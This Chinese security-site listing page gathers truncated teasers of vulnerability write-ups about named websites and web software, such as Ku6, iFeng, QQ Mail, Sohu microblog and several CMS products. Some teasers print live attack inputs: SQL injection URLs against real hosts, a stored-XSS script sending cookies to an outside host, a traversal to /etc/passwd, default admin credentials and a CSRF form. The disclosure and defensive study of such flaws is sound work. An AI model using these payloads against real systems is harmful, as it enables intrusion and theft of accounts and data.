PHP代码审计小技巧，PHP字符串偏移特性的分析关注热度:18

0x01 引言这是我在阅读80vul期刊中发表的[PCH-009]Security risk of php string offset一文后，根据自己的理解，对PHP offset这一特性，从实际角度出发，写出的分析。原文地址：http://www.2cto.com/Arti...[详情]

酷6两个注射点 - 网站安全 - 自学php关注热度:18

注入点:http://special.ku6.com/icetea/list.php?special_sort_id=2http://yechang.ku6.com/fans123.php?mid=10183%20and%20%28length%28user%28%29%29%3E19%29=1# 不多深入了..修复方案：这个你懂的作者：数据流..[详情]

蚂蚁游戏官方服务器设置不当及详细修复方案关注热度:20

两个漏洞 服务器解析漏洞 和现在很火的struts2命令执行漏洞0x0.1 解析漏洞随便注册一个用户然后在修改头像这边上传一个包含有恶意代码的图片http://www.gamemayi.com/mayi.website/upload/20120630..[详情]

优酷SWF未清理参数，参数注入导致恶意弹窗 - 网关注热度:16

http://static.youku.com/v1.0.0245/v/swf/loader.swf此FLash接受imglogo参数作为图片地址未检查该参数的有效性即加载该图片因此，当imglogo参数指向一个恶意的flash时（比如：乱弹窗的swf），恶意flash也..[详情]

sphpforum 0.4多个缺陷及修复 - 网站安全 - 自学php关注热度:12

作者: loneferret of Offensive Security影响产品: sphpforum影响版本: 0.4 (older versions may be affected)下载地址: http://sourceforge.net/projects/sphpforum/程序概述# Simple PHP Forum.....[详情]

MaxForum v1.0.0本地文件包含缺陷及修复 - 网站安全关注热度:17

+---------------------------------------+| MaxForum v1.0.0 Local File Inclusion |+---------------------------------------+作者 ahwak2000 z.u5[at]hotmail[dot]com下载地址 http://www.max4dev.....[详情]

ewebeditor上的那些事 - 网站安全 - 自学php关注热度:21

作者：暗月1、常规入侵默认后台：ewebeditor/admin_login.asp默认密码：admin admin8882、默认数据库db/ewebeditor.mdb有时候可能修改成asp 或者是asa进了后台就要上传木马添加aaspsp 或者asa cer aspx ph..[详情]

凤凰网财经分站注入，可获取数据库内容 - 网站关注热度:54

首先http://app.finance.ifeng.com/finance/fundhtml/indexpj.php?pj_type=CHENXINGfund_type=gporderby=abs(jjdm-(length(user())22)*8000)ordertype=asc返回页面而后尝试几个值，到 www.2cto.comhttp://a.....[详情]

QQ邮箱预览word附件造成的xss漏洞 - 网站安全 - 自关注热度:28

预览word附件造成的xss在word文档中添加一个超链接，执行javascript:alert(document.cookie);void(0)修复方案：:)作者 goderci..[详情]

xss攻击汇总 - 网站安全 - 自学php关注热度:54

(1)普通的XSS JavaScript注入SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(2)IMG标签XSS使用JavaScript命令SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(3)IMG标签无分号无引号IMG SRC=javascript:.....[详情]

ASP.NET防止Sql注入攻击的实现 - 网站安全 - 自学关注热度:16

应用范围:ASP.NET vertion 1.1 ASP.NET vertion 2.0概要:文本主要介绍如何校验用户输入从而防止注入式攻击.校验用户输入是非常必要的,几乎所有程序级的攻击都包含恶意输入的手段. 你应该校验..[详情]

XdCMS外卖、订餐、企业网站系统多处漏洞及修复关注热度:16

漏洞文件: System/modeules/member/login.phpif(empty($_COOKIE[#39;member_user#39;])||empty($_COOKIE[#39;member_userid#39;])) //只判断Cookie是否存在漏洞文件:www.2cto.com system/libs/base.class.....[详情]

天翼快递SQL注入点获取系统权限 - 网站安全 - 自关注热度:34

查询时过滤不全导致SQL注射漏洞0x0.1网站首页的公告栏里面的公告http://www.transparcel.com/newsDetail.asp?id=67 存在注入点 有个普通的过滤，SQL通用防注入系统-但是单单用这个过滤还不够的，我..[详情]

图虫网存储型XSS+Cookie泄漏导致账户密码泄漏 -关注热度:38

存储型XSS+Cookie泄漏导致账户泄漏EXIF里信息过滤不严格哈~javascript标签过滤了，script没过滤。我们来构造个/A/DDscriptdocument.write(#39;img src=http://lab.sh1ne.net/snap.php?c=#39;+documen.....[详情]

金山毒霸香港官网SQL注入、敏感信息泄漏、XSS攻关注热度:58

1、SQL注入漏洞：漏洞点：http://www.duba.com.hk:80/support_3_view.php?id=52、一些敏感后台URL：3、敏感信息泄漏：duba.hk.phpinfo.htm www.2cto.com4、文件目录遍历：5、XSS跨站脚本攻击：http://www.duba......[详情]

智思留言本4.1正式版上传漏洞 - 网站安全 - 自学关注热度:26

智思留言本4.1正式版,发表留言上传附件可以直接上传ASP执行文件.If Action="addsave" Then KeywordsFilter(FilterKeyWord)Dim RequestU,intCount,i,formName,FileSavePath,FileSaveName,uploadsDirVarR.....[详情]

MongoDB服务器端的JavaScript注入(官方已修复) - 网站关注热度:27

安全研究者agixid在MongoDB数据库2.2.3版本上发现一个安全漏洞，并且表示Metasploit利用payload正在开发当中。该漏洞主要是MongoDB不正确的使用SpiderMonkey Javascript的NativeHelper函数，导致可以注入..[详情]

搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全关注热度:39

1）CSRF刷粉丝搜狐对于xxx.t.sohu.com这样的域名均未校验referer，例子POC如下：htmlbodyform id=se55i0n name=se55i0n action=http://ourhome.t.sohu.com/follow/addfollows method=POSTinp.....[详情]

Free Hosting Manager V2.0.2多个sql注射 - 网站安全 - 自关注热度:24

软件 : Free Hosting Manager V2.0.2 Multiple SQLi 作者: Saadat Ullah , saadi_.....[详情]

ClipShare 4.1.1 (gmembers.php, gid param)盲注 - 网站安全关注热度:27

标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability 作者: Esac 影响程序: ClipShare - Video Sharing Community Script 4.1.4 官网: http://www.clip-share.com 任意.....[详情]

"Ra1NX" PHP Bot pubcall 绕过认证执行远程代码关注热度:20

# 标题: Ra1NX PHP Bot pubcall Authentication Bypass Remote Code Execution # 日期: March 24, 2013 # 作者: bwall # 下载地址: https://defense.ballastsecurity.net/decoding/index.....[详情]

WEB应用的安全的登录认证 - 网站安全 - 自学php关注热度:19

前些日子看到一个关于安全登录认证的博文，不过该文提到的登录认证算法有点复杂，而且仍然存在一些安全缺陷。想到之前了解过的HMAC算法，我觉得完全可以使用基于HMAC算法来进行..[详情]

BLDCMS(白老大小说) Getshell 0day EXP - 网站安全 - 自学关注热度:29

之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了既然都有人发..[详情]

discuzX2.5跨站漏洞利用 - 网站安全 - 自学php关注热度:28

0times;01 无法用获取的COOKIE登录分析都说DISCUZ X2.5（以下简称DZ25）的COOKIE拿到了也没有办法登录，但是为什么呢？今天就来简单的看一下，我们登录一个DZ25的站，登陆之后看下COOKIE在里面..[详情]

人人乐超市网站检测相关 - 网站安全 - 自学php关注热度:31

任意下载文件漏洞，XSS盲打后台，SQL注入，JbossWeb，疑似ckeditor上传漏洞等等。。首先是任意下载文件 最严重的http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../etc/passwdfileName=w.....[详情]

久游网FLASH安全问题深入分析与利用(一) - 网站安关注热度:28

getURL安全问题.案例:lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=xml/bcastr.xml这类型调用方式, 调用的外部配置或数据文件后缀，如: xml等Flash的actionscript脚本目前网络上存在2种版本，即2.0与3.0函数..[详情]

discuz 防注入函数绕过方法分析及没用心的修复补关注热度:36

文章出自：SafeKey Team @Seay分析人：晴天小铸，Seay分析时间：2013年03月20日原文地址：http://www.cnseay.com/archives/2447SafeKey Team 致力于web安全，软件编程，逆向分析等方向研究。discuz介绍：C..[详情]

旁注虚拟主机IIS权限重分配跨目录得webshell - 网站关注热度:194

国内的IDC运营商最常见的模式就是IIS搭配解析asp，有星外，新网，西数，华众等等。。。这些虚拟主机提权都是相当难。最近小生在和习科核心渗透群里的一次渗透测试中，就遇到了一..[详情]

人人网游戏XSS+SQL注入+爆路径+列目录，员工信息关注热度:72

XSS偷取cookies，还有注入，权限蛮大的哦，能直接load_file(#39;/etc/passwd#39;)目测拿下wan.renren.comhttp://wan.renren.com/service.shtml首先这里随便找了一个客服，提交时插入XSS代码，似乎名字那里，忘..[详情]

同花顺分站存在SQL注射以及信息泄露 - 网站安全关注热度:18

同花顺分站存在SQL注射，root权限，以及SVN信息泄露同花顺分站存在注入漏洞注射点 http://mobile2.10jqka.com.cn/books/index.php?op=modifyback=book_id=53root权限，在库里能找到一些管理账号密码，可以..[详情]